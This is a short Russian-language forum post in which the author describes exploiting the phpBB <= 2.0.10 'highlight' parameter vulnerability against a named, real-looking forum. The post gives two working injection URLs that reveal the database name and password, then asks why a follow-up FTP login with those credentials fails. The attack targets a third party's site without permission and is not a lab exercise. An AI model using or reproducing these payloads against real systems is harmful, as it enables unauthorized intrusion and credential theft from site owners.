Кароче сегодня решил попробовать поломать форумы phpBB, нашёл уязвимость для форумов
phpbb<=2.0.10 и нашёл по поиску форум http://doom-metal.h12.ru/forum/index.php, конечно давно закрыт и заброшен, но для теста уязвимости сойдёт набрал :
http://doom-metal.h12.ru/forum/viewtopic.php?p=3&highlight=%2527.$poster=$dbname. %2527
- узнал судя по уязвимости имя БД.
http://doom-metal.h12.ru/forum/viewtopic.php?p=3&highlight=%2527.$poster=$dbpassw d.%2527
-узнал пароль БД.
Пробуя зайти через SmartFTP, но не прёт в чём может быть причина ?